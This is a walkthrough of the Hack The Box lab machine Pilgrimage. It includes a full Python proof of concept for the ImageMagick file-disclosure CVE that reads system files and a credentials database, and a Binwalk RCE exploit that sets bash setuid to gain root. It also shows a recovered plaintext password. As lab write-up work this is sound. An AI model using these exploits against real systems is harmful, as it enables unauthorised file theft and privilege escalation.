# Pilgrimage - HTB

[[_TOC_]]

## Summary

<!-- markdownlint-disable MD033 -->
<div align="center"><img src="images/0.png"></div>

Pilgrimage is a pleasant, easy-rated HTB machine created by [coopertim13](https://app.hackthebox.com/users/55851)

The foothold involves retrieving source for web application with `git-dumper`.  
The `magick` binary in source is vulnerable to a local file disclosure and can be used to obtain credentials.  
Afterwards, CVE-2022-4510 has to be abused in Binwalk for RCE.

## Initial recon

```console
opcode@debian$ nmap -v -p- --min-rate 2000 10.10.11.219
Nmap scan report for 10.10.11.219
Host is up (0.089s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
```

```console
opcode@debian$ nmap -sC -sV -p 22,80 -oN pilgrimage.nmap 10.10.11.219
Nmap scan report for 10.10.11.219
Host is up (0.095s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
| ssh-hostkey: 
|   3072 20be60d295f628c1b7e9e81706f168f3 (RSA)
|   256 0eb6a6a8c99b4173746e70180d5fe0af (ECDSA)
|_  256 d14e293c708669b4d72cc80b486e9804 (ED25519)
80/tcp open  http    nginx 1.18.0
|_http-title: Did not follow redirect to http://pilgrimage.htb/
|_http-server-header: nginx/1.18.0
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
```

The usual SSH (22) and HTTP (80) ports are open.

Visiting <http://10.10.11.219/> in a browser redirected me to <http://pilgrimage.htb/>  
Therefore, I updated `/etc/hosts`:

```text
10.10.11.219 pilgrimage.htb
```

![1](images/1.png)

The website allows uploading of images (PNG and JPEG) and shrinks them (reduces the file size).  
The images are uploaded by making a POST request to `/`, which returns processed images at addresses structured like <http://pilgrimage.htb/shrunk/652e0290e03c4.jpeg>.

```console
opcode@debian$ exiftool 652e0290e03c4.jpeg 
ExifTool Version Number         : 12.57
File Name                       : 652e0290e03c4.jpeg
Directory                       : .
File Size                       : 21 kB
File Modification Date/Time     : 2023:10:17 09:12:11+05:30
File Access Date/Time           : 2023:10:17 09:12:52+05:30
File Inode Change Date/Time     : 2023:10:17 09:12:52+05:30
File Permissions                : -rw-r--r--
File Type                       : JPEG
File Type Extension             : jpg
MIME Type                       : image/jpeg
JFIF Version                    : 1.01
Resolution Unit                 : None
X Resolution                    : 1
Y Resolution                    : 1
Image Width                     : 1920
Image Height                    : 1080
Encoding Process                : Baseline DCT, Huffman coding
Bits Per Sample                 : 8
Color Components                : 3
Y Cb Cr Sub Sampling            : YCbCr4:2:2 (2 1)
Image Size                      : 1920x1080
Megapixels                      : 2.1
```

Nothing interesting was present in the metadata of resulting image.  
I tried basic path traversal payloads, but they failed.  
I also ran [ffuf](https://github.com/ffuf/ffuf):

```console
opcode@debian$ ffuf -c -w ~/CTF/wordlists/raft-small-words.txt -u http://pilgrimage.htb/FUZZ -mc all -e .php -fs 153 -v 2>/dev/null
[Status: 200, Size: 6166, Words: 1648, Lines: 172, Duration: 105ms]
| URL | http://pilgrimage.htb/login.php
    * FUZZ: login.php

[Status: 200, Size: 7621, Words: 2051, Lines: 199, Duration: 113ms]
| URL | http://pilgrimage.htb/index.php
    * FUZZ: index.php

[Status: 301, Size: 169, Words: 5, Lines: 8, Duration: 95ms]
| URL | http://pilgrimage.htb/tmp
| --> | http://pilgrimage.htb/tmp/
    * FUZZ: tmp

[Status: 200, Size: 6173, Words: 1646, Lines: 172, Duration: 103ms]
| URL | http://pilgrimage.htb/register.php
    * FUZZ: register.php

[Status: 302, Size: 0, Words: 1, Lines: 1, Duration: 113ms]
| URL | http://pilgrimage.htb/logout.php
| --> | /
    * FUZZ: logout.php

[Status: 301, Size: 169, Words: 5, Lines: 8, Duration: 98ms]
| URL | http://pilgrimage.htb/assets
| --> | http://pilgrimage.htb/assets/
    * FUZZ: assets

[Status: 200, Size: 7621, Words: 2051, Lines: 199, Duration: 137ms]
| URL | http://pilgrimage.htb/.
    * FUZZ: .

[Status: 302, Size: 0, Words: 1, Lines: 1, Duration: 106ms]
| URL | http://pilgrimage.htb/dashboard.php
| --> | /login.php
    * FUZZ: dashboard.php

[Status: 301, Size: 169, Words: 5, Lines: 8, Duration: 94ms]
| URL | http://pilgrimage.htb/vendor
| --> | http://pilgrimage.htb/vendor/
    * FUZZ: vendor

[Status: 301, Size: 169, Words: 5, Lines: 8, Duration: 102ms]
| URL | http://pilgrimage.htb/.git
| --> | http://pilgrimage.htb/.git/
    * FUZZ: .git
```

## Retrieving source with `git-dumper`

After find <http://pilgrimage.htb/.git/>, I used [git-dumper](https://github.com/arthaud/git-dumper) to retrieve the source for this web application:

```console
opcode@debian$ git-dumper http://pilgrimage.htb/.git ~/app
```

Once dumped, I looked for git oversights to no avail:

```console
opcode@debian$ git log
commit e1a40beebc7035212efdcb15476f9c994e3634a7 (HEAD -> master)
Author: emily <emily@pilgrimage.htb>
Date:   Wed Jun 7 20:11:48 2023 +1000

    Pilgrimage image shrinking service initial commit.

opcode@debian$ git branch
* master
```

## CVE-2022-44268 - ImageMagick Local File Disclosure

[ImageMagick](https://imagemagick.org/index.php) is being used to reduce image size:

```php
if ($_SERVER['REQUEST_METHOD'] === 'POST') {
  $image = new Bulletproof\Image($_FILES);
  if($image["toConvert"]) {
    $image->setLocation("/var/www/pilgrimage.htb/tmp");
    $image->setSize(100, 4000000);
    $image->setMime(array('png','jpeg'));
    $upload = $image->upload();
    if($upload) {
      $mime = ".png";
      $imagePath = $upload->getFullPath();
      if(mime_content_type($imagePath) === "image/jpeg") {
        $mime = ".jpeg";
      }
      $newname = uniqid();
      exec("/var/www/pilgrimage.htb/magick convert /var/www/pilgrimage.htb/tmp/" . $upload->getName() . $mime . " -resize 50% /var/www/pilgrimage.htb/shrunk/" . $newname . $mime);
      unlink($upload->getFullPath());
      $upload_path = "http://pilgrimage.htb/shrunk/" . $newname . $mime;
      if(isset($_SESSION['user'])) {
        $db = new PDO('sqlite:/var/db/pilgrimage');
        $stmt = $db->prepare("INSERT INTO `images` (url,original,username) VALUES (?,?,?)");
        $stmt->execute(array($upload_path,$_FILES["toConvert"]["name"],$_SESSION['user']));
      }
      header("Location: /?message=" . $upload_path . "&status=success");
    }
    else {
      header("Location: /?message=Image shrink failed&status=fail");
    }
  }
  else {
    header("Location: /?message=Image shrink failed&status=fail");
  }
}
```

I obtained the version `magick` binary being used:

```console
opcode@debian$ ./magick -version
Version: ImageMagick 7.1.0-49 beta Q16-HDRI x86_64 c243c9281:20220911 https://imagemagick.org
Copyright: (C) 1999 ImageMagick Studio LLC
License: https://imagemagick.org/script/license.php
Features: Cipher DPC HDRI OpenMP(4.5) 
Delegates (built-in): bzlib djvu fontconfig freetype jbig jng jpeg lcms lqr lzma openexr png raqm tiff webp x xml zlib
Compiler: gcc (7.5)
```

For `ImageMagick 7.1.0-49 beta`, I immediately found a file disclosure vulnerability:  
<https://web.archive.org/web/20230204153715/https://www.metabaseq.com/imagemagick-zero-days/>

It is a File Disclosure vulnerability. Using <https://github.com/agathanon/cve-2022-44268> as a reference, I wrote another Python PoC more suitable for this box: [read_file.py](read_file.py):

```py
import requests

from io import BytesIO
from PIL import Image
from PIL.PngImagePlugin import PngInfo
from sys import argv
from urllib.parse import urlparse, parse_qs


def create_payload(path):
    img = Image.new("RGB", (1, 1), color="white")
    meta = PngInfo()
    meta.add_text("profile", path)

    imagedata = BytesIO()
    img.save(imagedata, format="PNG", pnginfo=meta)
    imagedata.seek(0)

    return imagedata


def upload_payload(payload):
    URL = "http://pilgrimage.htb"

    file = {"toConvert": ("payload.png", payload, "image/png")}
    r = requests.post(URL, files=file, proxies=proxy)

    return r.url


def extract_url(url):
    new_url = urlparse(url).query
    image_path = parse_qs(new_url).get("message")[0]

    return image_path


def parse_contents(url):
    r = requests.get(url, proxies=proxy)
    imagedata = BytesIO(r.content)

    img = Image.open(imagedata)

    for k, v in img.info.items():
        if "Raw profile type" in k:
            exfil = v.strip().split("\n")
            chunks = "".join(exfil[1:])
            contents = bytes.fromhex(chunks).decode("utf-8")
            return contents

    return "Could not retrieve file"


if __name__ == "__main__":
    proxy = {}
    # proxy["http"] = "http://127.0.0.1:8080"

    payload = create_payload(argv[1])
    redirect_path = upload_payload(payload)
    image_path = extract_url(redirect_path)
    file_contents = parse_contents(image_path)
    print(file_contents)
```

The script takes an argument: the path to a file and returns its contents.  
The library `Pillow` is a prerequisite for running the script.

```console
opcode@debian$ python3 -m pip install Pillow --break-system-packages
opcode@debian$ python3 python3 read_file.py '/etc/passwd'
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-network:x:101:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:102:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:109::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:104:110:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
emily:x:1000:1000:emily,,,:/home/emily:/bin/bash
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
sshd:x:105:65534::/run/sshd:/usr/sbin/nologin
_laurel:x:998:998::/var/log/laurel:/bin/false
```

In the source code, I noted that the web application was using SQLite3 database.  
The database file resided in the directory `/var/db/pilgrimage`.

I modified the script to download files instead of reading them: [download_file.py](download_file.py)

```diff
-             contents = bytes.fromhex(chunks).decode("utf-8")
+             contents = bytes.fromhex(chunks)

-     print(file_contents)

+     filename = argv[1].split('/')[-1]
+     with open(filename, 'wb') as f:
+         f.write(file_contents)
```

I proceeded to download the database and looked inside:

```console
opcode@debian$ python3 download_file.py '/var/db/pilgrimage'
opcode@debian$ sqlite3 pilgrimage
SQLite version 3.40.1 2022-12-28 14:03:47
Enter ".help" for usage hints.
sqlite> .tables
images  users 
sqlite> select * from users;
emily|abigchonkyboi123
```

The credentials worked for SSH:

```console
opcode@debian$ sshpass -p 'abigchonkyboi123' ssh -o StrictHostKeyChecking=no emily@pilgrimage.htb
```

## CVE-2022-4510 - Binwalk RCE

I ran [linpeas.sh](https://github.com/carlospolop/PEASS-ng), but I didn't notice anything unusual.  
Afterwards, I uploaded [pspy](https://github.com/DominicBreuker/pspy) and left it running for a while.  
Scrolling up, I found:

```text
2023/10/19 01:23:32 CMD: UID=0     PID=740    | /bin/bash /usr/sbin/malwarescan.sh 
```

This bash script runs with root privileges whenever a file is uploaded to the website. It would be hard to notice without scrolling all the way up in `pspy`.

```console
emily@pilgrimage:~$ cat /usr/sbin/malwarescan.sh
```

```bash
#!/bin/bash

blacklist=("Executable script" "Microsoft executable")

/usr/bin/inotifywait -m -e create /var/www/pilgrimage.htb/shrunk/ | while read FILE; do
    filename="/var/www/pilgrimage.htb/shrunk/$(/usr/bin/echo "$FILE" | /usr/bin/tail -n 1 | /usr/bin/sed -n -e 's/^.*CREATE //p')"
    binout="$(/usr/local/bin/binwalk -e "$filename")"
        for banned in "${blacklist[@]}"; do
        if [[ "$binout" == *"$banned"* ]]; then
            /usr/bin/rm "$filename"
            break
        fi
    done
done
```

No path injection or symlink oversights; the problem is `binwalk`:

```console
emily@pilgrimage:~$ binwalk --help

Binwalk v2.3.2
Craig Heffner, ReFirmLabs
https://github.com/ReFirmLabs/binwalk

Usage: binwalk [OPTIONS] [FILE1] [FILE2] [FILE3] ...

[--SNIP--]
```

Binwalk v2.3.2 does have a CVE: <https://onekey.com/blog/security-advisory-remote-command-execution-in-binwalk/>  
It needs to be run with `-e` option, and that requirement is met on this box.  
I used the PoC at <https://raw.githubusercontent.com/electr0sm0g/CVE-2022-4510/main/RCE_Binwalk.py> to generate malicious images.  
I changed the payload to `touch /tmp/grass`.

```console
opcode@debian$ python3 RCE_Binwalk.py OS.png 10.10.14.88 9001
```

I uploaded the malicious image to the box and ran `binwalk` myself:

```console
emily@pilgrimage:~$ binwalk -e binwalk_exploit.png 

DECIMAL       HEXADECIMAL     DESCRIPTION
--------------------------------------------------------------------------------
0             0x0             PNG image, 300 x 300, 8-bit/color RGBA, non-interlaced
62            0x3E            Zlib compressed data, default compression
48189         0xBC3D          PFS filesystem, version 0.9, 1 files
```

Still, no `grass` was created in `/tmp`.  
Due to the `-e` option, a directory was created with extracted files:

```console
emily@pilgrimage:~$ ls _binwalk_exploit.png.extracted/
3E  3E.zlib  BC3D.pfs  pfs-root
```

After going though <https://onekey.com/blog/security-advisory-remote-command-execution-in-binwalk/> I learnt that the vulerability impacted PFS files.  
When I ran `binwalk` on the `BC3D.pfs` file inside `_binwalk_exploit.png.extracted`, it worked, and `/tmp/grass` was created:

```console
emily@pilgrimage:~/_binwalk_exploit.png.extracted$ binwalk -e BC3D.pfs

DECIMAL       HEXADECIMAL     DESCRIPTION
--------------------------------------------------------------------------------
0             0x0             PFS filesystem, version 0.9, 1 files

emily@pilgrimage:~/_binwalk_exploit.png.extracted$ ls /tmp/
grass
systemd-private-b6420c51b97f414b8328e05e76f9d4db-systemd-logind.service-1L1R0g
systemd-private-b6420c51b97f414b8328e05e76f9d4db-systemd-timesyncd.service-yHnnhj
vmware-root_618-2697467179
```

I remodified the payload in `RCE_Binwalk.py`, this time setting it to `chmod u+s /usr/bin/bash`.

```console
emily@pilgrimage:~$ wget 10.10.14.88:8000/binwalk_exploit.png
emily@pilgrimage:~$ binwalk -e binwalk_exploit.png 

DECIMAL       HEXADECIMAL     DESCRIPTION
--------------------------------------------------------------------------------
0             0x0             PNG image, 300 x 300, 8-bit/color RGBA, non-interlaced
62            0x3E            Zlib compressed data, default compression
48189         0xBC3D          PFS filesystem, version 0.9, 1 files
48551         0xBDA7          Unix path: /usr/bin/bash")
```

Then, I transferred the generated PFS file to the directory where `malwarescan.sh` is expecting it:

```console
emily@pilgrimage:~$ ls _binwalk_exploit.png.extracted/
3E  3E.zlib  BC3D.pfs  pfs-root
emily@pilgrimage:~$ cp _binwalk_exploit.png.extracted/BC3D.pfs /var/www/pilgrimage.htb/shrunk/
```

After a few seconds:

```console
emily@pilgrimage:~$ ls -la /usr/bin/bash
-rwsr-xr-x 1 root root 1234376 Mar 28  2022 /usr/bin/bash
```

It worked as intended. I ran `bash` with the `-p` option to retain the effective user id:

```console
emily@pilgrimage:~$ bash -p
bash-5.1# id
uid=1000(emily) gid=1000(emily) euid=0(root) groups=1000(emily)
```
